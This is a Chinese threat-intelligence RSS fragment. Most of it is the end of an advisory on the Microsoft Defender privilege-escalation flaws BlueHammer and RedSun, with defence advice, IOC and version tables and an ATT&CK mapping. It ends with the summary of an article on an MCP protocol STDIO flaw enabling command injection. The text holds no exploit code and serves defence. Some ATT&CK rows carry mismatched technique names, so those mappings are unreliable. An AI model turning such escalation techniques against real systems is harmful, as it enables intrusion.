&#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">企业级防护建议</span></h3><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">补丁管理</span><span textstyle="" style="font-size: 16px;">：确保企业补丁分发系统（WSUS/SCCM/Intune）已同步最新Defender平台更新</span></span></strong></p></li><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">最小权限原则</span><span textstyle="" style="font-size: 16px;">：限制本地管理员权限范围，减少攻击面</span></span></strong></p></li><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">行为监控</span><span textstyle="" style="font-size: 16px;">：部署EDR解决方案，监控MsMpEng.exe进程的异常子进程创建和文件写入行为</span></span></strong></p></li><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">网络分段</span><span textstyle="" style="font-size: 16px;">：对高价值资产实施严格的网络隔离，限制横向移动路径</span></span></strong></p></li><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">日志分析</span><span textstyle="" style="font-size: 16px;">：集中收集Windows安全日志，关联分析权限提升特征</span></span></strong></p></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">总结</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">BlueHammer（CVE-2026-33825）和RedSun漏洞的连续披露，揭示了终端安全领域的深层次问题：即便是微软这样的顶级厂商，其核心安全产品同样存在可被利用的漏洞。更值得关注的是RedSun漏洞展现的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">安全工具滥用</span></strong><span leaf="">（Attack of the Transformers）这一新兴攻击范式——攻击者不再寻找传统代码缺陷，而是挖掘产品正常功能的误用路径。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从威胁情报角度评估，该漏洞对APT组织的利用价值极高，其公开披露显著降低了攻击门槛。考虑到Windows Defender的全球部署规模，奇安信威胁情报中心将该漏洞的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">全球威胁等级评定为&#34;高&#34;</span></strong><span leaf="">。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信安全产品矩阵已支持对该攻击链的检测：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">奇安信天眼新一代威胁感知系统</span><span textstyle="" style="font-size: 16px;">：可检测RedSun攻击链的多个检测点</span></span></strong></p></li></ul><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">奇安信椒图（HIDS）</span><span textstyle="" style="font-size: 16px;">：监控关键系统目录的异常写入行为</span></span></strong></p></li></ul><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;" data-pm-slice="1 1 [&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type: circle&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type:disc;font-size:16px&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,null,&#34;para&#34;,null,&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 16px;font-weight: bold;">奇安信终端安</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">管理系统（EDR）</span><span textstyle="" style="font-size: 16px;">：提供进程行为链分析，识别权限提升攻击</span></span></strong></p></li></ul></ul><ul style="overflow-wrap: break-word;list-style: circle;padding-left: 1em;margin-left: 0px;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">IOC指标</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">类型</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">指标</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-33825</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Microsoft Defender权限提升漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CWE</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CWE-1220</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">访问控制粒度不足（漏洞根因）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">漏洞代号</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">BlueHammer</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-33825的非官方命名</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">漏洞代号</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">RedSun</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">针对Defender云标签处理的独立漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">软件版本</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">≤ 4.18.26020.6</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">受影响Defender平台版本</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">修复版本</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">≥ 4.18.26030.3011</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">安全版本</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK技术编号参考</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术ID</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">战术</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1068</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升（Privilege Escalation）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用软件漏洞提权</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1548</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升（Privilege Escalation）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">滥用权限控制机制</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1136.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化（Persistence）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">本地账户创建</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1544</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化（Persistence）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">远程文件替代</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1499.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">影响（Impact）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">竞争条件滥用</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">[1].<a href="https://cybersecuritynews.com/microsoft-defender-0-day-vulnerability/" target="_blank">https://cybersecuritynews.com/microsoft-defender-0-day-vulnerability/</a></span></span></p><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">[2].<a href="https://www.redpacketsecurity.com/redsun-a-windows-privilege-escalation-poc-that-turns-defender-into-part-of-the-attack-chain/" target="_blank">https://www.redpacketsecurity.com/redsun-a-windows-privilege-escalation-poc-that-turns-defender-into-part-of-the-attack-chain/</a></span></span></p><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="will-change: transform;box-sizing: border-box;"><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034832" data-ratio="0.5" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=2bdc81d2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqic48JFFjrH9MOxPpXgAt8e5R7Yb8Yy2KdwYWoBia7xqujfx44V136icqR1AGFBxP0ShddSSQPJfnT9FufSNSgcDsONoDeC4RqkH4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.1</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9663a677&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518486%26idx%3D1%26sn%3D550ba4e79eec1f50c66aa188e04ad78e">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 20 Apr 2026 14:31:00 +0800</pubDate>
    </item>
    <item>
      <title>MCP协议架构级漏洞深度分析：STDIO设计缺陷引发大规模AI供应链安全危机</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518473&amp;idx=1&amp;sn=39cc2ea54cae3aee275196ef01298f3f</link>
      <description>奇安信威胁情报中心监测发现，Ox Security于4月披露了Anthropic公司MCP协议中存在的架构级设计缺陷。该漏洞根植于MCP协议的STDIO传输机制，利用此缺陷可实现未授权命令注入与远程代码执行，超过20万台服务器受影响，相关SDK累计下载量突破1.5亿次</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-19 09:30</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e8b49f1d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicCZAfKpvTTsNq15lPqt4HV20klxwtjWtiaaVjblrUGKE0Rp4FmzyIuK3DG3l6t4rpcaVSbWSHYXh0uicuAY3WtmTqibWOGa8o8Qw%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>奇安信威胁情报中心监测发现，Ox Security于4月披露了Anthropic公司MCP协议中存在的架构级设计缺陷。该漏洞根植于MCP协议的STDIO传输机制，利用此缺陷可实现未授权命令注入与远程代码执行，超过20万台服务器受影响，相关SDK累计下载量突破1.5亿次</p>
